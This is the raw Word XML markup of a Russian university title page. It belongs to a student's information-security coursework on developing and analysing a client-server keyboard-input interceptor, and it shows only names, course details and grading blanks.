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CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc404095740"/>
      <w:bookmarkStart w:id="1" w:name="_Toc404532367"/>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B88B477" wp14:editId="56800967">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>55245</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1042670" cy="1147445"/>
            <wp:effectExtent l="0" t="0" r="508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54" t="18439" r="16830" b="20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1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Министерство науки и высшего образования Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Калужский филиал федерального государственного бюджетного образовательного учреждения высшего образования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>«Московский государственный технический университет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>имени Н.Э. Баумана</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(национальный исследовательский университет)»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(КФ МГТУ им. Н.Э. Баумана)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ru-RU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980"/>
        <w:gridCol w:w="6375"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ФАКУЛЬТЕТ</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6383" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ИУ-КФ «Информатика и управление»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2982" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>КАФЕДРА</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6383" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:spacing w:val="-6"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ИУ6-КФ «Защита информации»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>РАСЧЕТНО - ПОЯСНИТЕЛЬНАЯ ЗАПИСКА</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>к курсовой работе на тему:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Разработка </w:t>
      </w:r>
      <w:r w:rsidR="00BB6AF7">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и анализ поведения </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>клиент-серверного приложения</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A260A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>перехватывающего вводимые с клавиатуры данные</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811B40" w:rsidRPr="005F1CAF" w:rsidRDefault="00811B40" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">по дисциплине </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1CAF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Защита в операционных системах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU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840"/>
        <w:gridCol w:w="1414"/>
        <w:gridCol w:w="4826"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4254" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Студент группы БАС.И-91</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4826" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2130"/>
                <w:tab w:val="left" w:pos="2413"/>
                <w:tab w:val="left" w:pos="4536"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00811B40">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Ольховский К.В</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF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  <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="850"/>
                <w:tab w:val="left" w:pos="3402"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>(подпись)</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF"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ab/>
              <w:t>(ФИО)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4254" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Руководитель</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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</w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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4826" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2130"/>
                <w:tab w:val="left" w:pos="2413"/>
                <w:tab w:val="left" w:pos="4536"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A260A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Жарова О.Ю</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF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  <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="850"/>
                <w:tab w:val="left" w:pos="3402"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>(подпись)</w:t>
            </w:r>
            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="2"/>
            <w:r w:rsidRPr="005F1CAF"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ab/>
              <w:t>(ФИО)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Оценка руководителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="714"/>
                <w:tab w:val="left" w:pos="2551"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> баллов </w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="147"/>
                <w:tab w:val="left" w:pos="1848"/>
              </w:tabs>
              <w:ind w:firstLine="0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 w:rsidRPr="005F1CAF"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ab/>
              <w:t>30-50</w:t>
            </w:r>
            <w:r w:rsidRPr="005F1CAF"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ab/>
              <w:t>(дата)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidTr="00A3713D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:snapToGrid w:val="0"/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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Оценка защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="005F1CAF" w:rsidRPr="005F1CAF" w:rsidRDefault="005F1CAF" w:rsidP="005F1CAF">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="714"/>
                <w:tab w:val="left" w:pos="2551"/>
              </w:tabs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5F1CAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005F1CAF">
              <w:rPr>
